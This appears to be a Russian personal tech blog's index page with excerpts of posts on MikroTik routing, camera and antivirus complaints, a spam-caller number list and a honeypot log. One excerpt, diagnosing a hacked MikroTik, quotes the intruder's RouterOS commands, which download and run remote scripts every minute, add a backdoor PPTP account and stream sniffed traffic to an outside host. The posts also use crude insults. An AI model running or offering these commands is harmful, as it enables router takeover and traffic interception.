Больше НЕ покупаю камеры под управлением Yoosee

отвратительная камера с yoosee отзывы о yoosee лагает не покупайтеКак-то раз не глядя купил wifi Ip камеру с али.
Когда пришла камера сразу начал настраивать и столкнулся с отвратительным приложением YOOSEE.
Почему YOOSEE? А почему бы не настроить через WEB интерфейс? Да потому что нет у неё веб интерфейса- ПОЛНОЕ Г0МН0.
Читать дальше

WebRTC или кто-то за нами следит?

Интернет
WebRTC (англ. real-time communications — коммуникации в реальном времени) — проект с открытым исходным кодом, предназначенный для организации передачи потоковых данных между браузерами или другими поддерживающими его приложениями по технологии точка-точка. На уровне API технология стандартизируется консорциумом W3C, а на протокольном уровне — сообществом IETF.

Ну и что?

Читать дальше

Микротик и проброс портов в локальную сеть если два провайдера (два шлюза)

Интернет
Жил да был обычный Микротик, никого не трогал.
Но вот приключилась у него кручинушка.
Появился во втором порту новый провайдер лютый, да с внешним айпишником.
Вот тут то всё и закрутилось.


Имеется два приходящих канала от двух провайдеров с белыми ip адресами.
Требуется пробросить порт 80 до сервера в локальной сети так чтобы он был доступен по любому из каналов.
Суть проблемы заключается в том что шлюз по умолчанию один, пакет сам по себе не пойдёт куда надо, его надо научить ходить правильно и ровно.
Долго парился и наткнулся на правильную идею маркировать всё что движется, а что не движется — двигать и маркировать!

Читать дальше

Светодиод порога KE5431KA32S1 как отремонтировать самому?

РЕМОНТ и разборка
В ремонт попали фонари порога NISSAN MURANO,
Вроде чё там какае-то пластмасска с 4мя светодиодами. Но стоит этот светодиодный фонарик под 3 т.р.
СВЕТОИЗЛУЧАЮЩИЙ ДИОД KE5431KA32S1
Цены KE5431KA32S1
никаких аналогов? Китайских на али нет? Ужас
АХуЕРЕнеЛИ ЧТОЛИ?
2700рублей? ЗА ЭТУ СВИСТЮЛЬКУ?


Ну ладно будем чинить сами!
Читать дальше

СПАМ ЗВОНКИ И МОШЕННИКИ

Blog by Mikro

СПИСОК МОШЕННИКОВ ИЛИ СПАМЕРОВ ПРОЗВОНЩИКОВ нарушающих ФЕДЕРАЛЬНЫЙ ЗАКОН О РЕКЛАМЕ и(или) ФЕДЕРАЛЬНЫЙ ЗАКОН О ПЕРСОНАЛЬНЫХ ДАННЫХ

+74953241313 КОФЕКАП! Надоедливые звонки. НАчали звонить после регистрации и покупки кофе в Тестикофе. Базу слили или тестикофе продались.
+79601843067 Ирина компания Каркадэ или каркада, новый медицински массажный центр, «хорода» Обнинск
+79913466537 Виктор Центр Калуги комплексное обследование по 3м направлениям
+79913466360 Клиника в Калуге с обследованием и навязчивой рекламой
+79913466713 Клиника в Калуге с обследованием и навязчивой рекламой
+79913466729 Клиника в Калуге с обследованием и навязчивой рекламой
+79913468453 Клиника в Калуге с обследованием и навязчивой рекламой
Новая ФИШКА! Говорит что звонит из Из информационного центра России
ЗАЕ6АЛИ УЖЕ С КЛИНИКОЙ В ЦЕНТРЕ КАЛУГИ!!!
Сперва идёт блевотский звук типа мелодии и потом сразу здравствуйте, меня зовут… Если Вам звонят и просят представится то говорите что вы Иван и Вам 17 лет, сразу отбой.
Для телефонов Xiaomi с ОС MIUI Безопасность>Антиспам>Чёрный список>Добавить>Добавить Префикс>+7991346

+78005551534 ТИНЬКОФФ БАНК с целью распространения рекламы и продвижения услуг банка ТИНЬКОФФ.
+79266486632 реклама предоставления ненужных мне услуг по web сайтам. Прут данные из whois
+79964759208 спам про улучшение рейтинга страницы в поиске с помощью яндекс рекламы, ониже выше номер.

Все звонки были записаны как доказательства правонарушения.

Наивные ХАКЕРЫ или Тролим БОТНЕТ WANNAMINE

ХАЦКЕРЫ
haker pidor
На накенец-то дошли руки до того чтобы посмотреть зачем хакерам доступ к терминалу SSH и Telnet.
Запускаем на серваке ФЭЙКОВЫЙ терминал cowrie, даём кулхакеру подобрать пароль напимер admin и пароль Qwerty!
Ржом!
Большинство уродБотНетов делают одно и тоже.
Входят,
62.93.166.91] login attempt [b'nproc'/b'nproc'] succeeded

Узнают тип процессора
62.93.166.91] executing command «b'cat /proc/cpuinfo | grep name | wc -l'»
62.93.166.91] Command found: cat /proc/cpuinfo

ну и уходят.

Но попался наконец-то кулхацкер… айпишник этого говноря 58.240.92.50! Ещё и китайский конечно же.

Читать дальше

Резервирование канала на Mikrotik

Интернет
После обновления Микротика до прошивки 6.42.6 (stable) перестали срабатывать скрипты привязанные к узлам Netwatch.
Нашлось временное решение убрать галочки в разрешениях скрипта, но полностью проблему не решило, так как глобальные переменные перестали быть глобальными и переключение канала в случае отвала больше не работало как раньше.
резервный канал на микротике
В тырнете на сайте serveradmin.ru взял первый попавшийся скрипт переключения канала на резерв в случае падения основного.
Понравилась идея, берём и модернизируем, добавляем что-то своё и удаляем что- то ненужное.
Читать дальше

OpenWrt на роутере Tp-link 3220 с резервным каналом через 3G/4G модем

Интернет
tp-link TL-MR3220
Для того чтобы подключить резервный канал Интернет через роутер tp-link TL-MR3220 впринципе ничего сложного не надо.

Воткнул модем и с родной прошивкой настроил резерв на модем.
Так заявляет производитель:
Функция автоматического переключения каналов 3G/4G и WAN гарантирует постоянное подключение к Интернет
Просто так это было бы скучно, воткнул и работает.
Конечно лучше всего всё сделать сложнее сложного.
Вкратце это прошивка модема и написание пары скриптов.
Но лучше ещё всё усложнить и перепаять флэш память у роутера.

Читать дальше

После взлома микротик стал ПРОКСИ шпионом

Интернет
Следствия и Последствия взлома микротика
Недавно столкнулся с одним глюкующим микротиком, он стал терять пакеты и потерял управление по winbox.
Зайдя локально по мак адресу на устройство было видно то, что проц упёрт в 100%, фаервол соединений около 3000 штук, в логах только одна строчка. Порт винбокс поменяли.
Микротик с внешним айпишником и прошивкой 6.42.7
Ну ясно!
Микротик взломали!
Для начала вырубил webproxy на котором подсели сотки юзарей.
Вырубил носки.
и обратил внимание на правила в фаерволе и манглы.
О ужас! Этож открытый прокси сервер! Идёт перенаправление и перехват данных.
Во всех списках прокси листах он уже есть! ЁП!

В общем всё по порядку как это делали злодеи, ломатели микротиколв.
В терминале посмотрел последние комманды
/tool fetch url=http://47.96.89.95:8000/autosupout.rif;:delay 5;/im autosupout.rif;/file remove
[find name=autosupout.rif];:if ([:len [/ip pool find name=dodo]]=0) do={/ip pool add name=dodo range=100.64.0.1-1
00.64.254;/ppp pro add name=dodo copy-from=default-encryption local-address=100.64.0.0 remote-address=dodo;/ppp se
c add name=dodo pass=dodo profile=dodo;/in pptp-ser server set enabled=yes;/ip fi nat add chain=srcnat src-address
=100.64.0.0/16 action=masquerade}

/tool sniffer set streaming-server=37.1.207.114 streaming-enabled=yes
/tool sniffer set filter-interface=all filter-ip-protocol=tcp,udp filter-port=20,21,110,143,150
0,10000 

/system scheduler add name="CMD_OS" start-time="startup" interval="00:01:00" on-event="/tool fe
tch url=http://src-ip.com/cmd.txt mode=http dst-path=i113.rsc\r\n/import i113.rsc;:delay 6s;/file remove i113.rsc"


из последнего было ясно что запущена пачка комманд с ресурса src-ip.com/cmd.txt
код
Читать дальше

Правда и лож антивируса AVG (Мифы антивируса)

Интернет
Установил бесплатный антивирус AVG ПК.
Потестировал, постоянно вылазит всякая хрень, то пытаются оптимизировать то усилить защиту сообщения на дурачка,

ЗАДАЛБАЛ ЭТОТ AVG.

Вдруг откуда не возьмись появилась очередная утка от этого антивируса AVG.
Явно враньё, AVG Вы возможно считаете всех дураками?
Да и написано неграмотно — просто отвратительно.
Собственно предупреждение
Найдены 4 проблемы с конфиденциальностью
Как AVG пудрит голову и враньё

Читать дальше